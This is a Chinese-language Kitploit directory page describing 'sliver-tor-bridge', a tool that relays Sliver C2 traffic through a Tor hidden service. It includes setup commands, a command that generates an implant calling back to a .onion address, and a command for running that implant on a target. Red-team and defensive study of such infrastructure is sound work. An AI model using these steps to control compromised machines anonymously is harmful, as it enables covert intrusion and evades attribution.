Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
sliver-tor-bridge — Tor 传输桥接器,用于 Sliver C2——匿名命令与控制 | Kitploit
工具/GitHubGitHub/otsmane-ahmed/sliver-tor-bridge
Payload生成网络安全渗透测试命令与控制红队
GitHubotsmane-ahmed/sliver-tor-bridge

sliver-tor-bridge

Tor 传输桥接器,用于 Sliver C2——匿名命令与控制

查看仓库
60837个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Python License Docker Sliver

sliver-tor-bridge

基于 Tor 的传输桥接,用于 Sliver C2。创建一个隐藏服务,并将流量代理到您的 Sliver 服务器,从而保证真实 IP 永不暴露。

功能说明

设置一个指向本地 HTTP 代理的 Tor 隐藏服务。该代理将所有流量转发到 Sliver 的 HTTPS 监听器。植入体通过 Tor 连接,您通过 Sliver 正常控制它们。

root@kitploit:~
sliver server <---> proxy <---> tor hidden service <---> implant
   :8443           :8080          xyz.onion              (via tor)

为什么使用它

  • 您的 C2 服务器 IP 通过 Tor 隐藏
  • 植入体只知道 .onion 地址,不知道您的真实 IP
  • 与原生 Sliver 配合使用,无需修改
  • 简单的 Python 设置,无需 Go 编译

需求

  • python 3.8+
  • tor (apt install tor)
  • sliver (https://sliver.sh)

安装

root@kitploit:~
git clone https://github.com/Otsmane-Ahmed/sliver-tor-bridge.git
cd sliver-tor-bridge
python3 -m venv venv
source venv/bin/activate
pip install -e .

用法

启动 Sliver 并开启一个 HTTPS 监听器:

root@kitploit:~
sliver-client
sliver > https -L 127.0.0.1 -l 8443

在另一个终端中,启动桥接:

root@kitploit:~
sudo systemctl stop tor
sliver-tor-bridge start --sliver-port 8443

输出结果将类似:

root@kitploit:~
[+] Tor started successfully!
[+] Hidden Service: http://abc123xyz.onion
[+] Bridge is READY!

等待 .onion 地址出现,然后生成植入体:

root@kitploit:~
sliver > generate --http http://abc123xyz.onion --os linux --save /tmp/implant

在目标上运行植入体(需要 Tor):

root@kitploit:~
HTTP_PROXY=socks5h://127.0.0.1:9050 ./implant

CLI 选项

root@kitploit:~
sliver-tor-bridge start [OPTIONS]

--sliver-port    Sliver HTTPS 端口(默认 8443)
--tor-port       Tor SOCKS 端口(默认 9050)
--service-port   隐藏服务端口(默认 80)
-c, --config     配置文件路径

其他命令:

root@kitploit:~
sliver-tor-bridge status    # 检查隐藏服务是否正在运行
sliver-tor-bridge stop      # 清理隐藏服务目录

工作原理

root@kitploit:~
graph LR
    Implant[Implant] -->|Tor Network| HS["Hidden Service (.onion)"]
    HS -->|TCP :8080| Proxy["Bridge Proxy"]
    Proxy -->|HTTPS :8443| Sliver["Sliver Server"]
  1. Tor 管理器启动一个 Tor 进程并创建一个隐藏服务
  2. 隐藏服务指向 localhost:8080(代理)
  3. Flask 代理监听 8080 端口并将请求转发到 localhost:8443 上的 Sliver
  4. Sliver 正常处理植入体通信

桥接位于中间并中继流量。Sliver 认为它收到的是正常的 HTTPS 连接。植入体认为它正在与一个正常的 HTTP 服务器通信。

Docker

root@kitploit:~
docker-compose up -d
docker-compose logs -f

测试

root@kitploit:~
pip install pytest
pytest tests/

文件

root@kitploit:~
sliver_tor_bridge/
  cli.py          # 命令行界面
  tor_manager.py  # 启动 Tor 并创建隐藏服务
  proxy.py        # 转发到 Sliver 的 Flask 应用
  config.py       # 配置处理

故障排除

Tor 无法启动:确保系统 Tor 已停止(sudo systemctl stop tor)

连接超时:Tor 引导过程可能需要 1-3 分钟,请等待 100%

植入体无法连接:确保植入体可以访问 Tor(SOCKS 代理在 9050 端口)

许可证

MIT

下载工具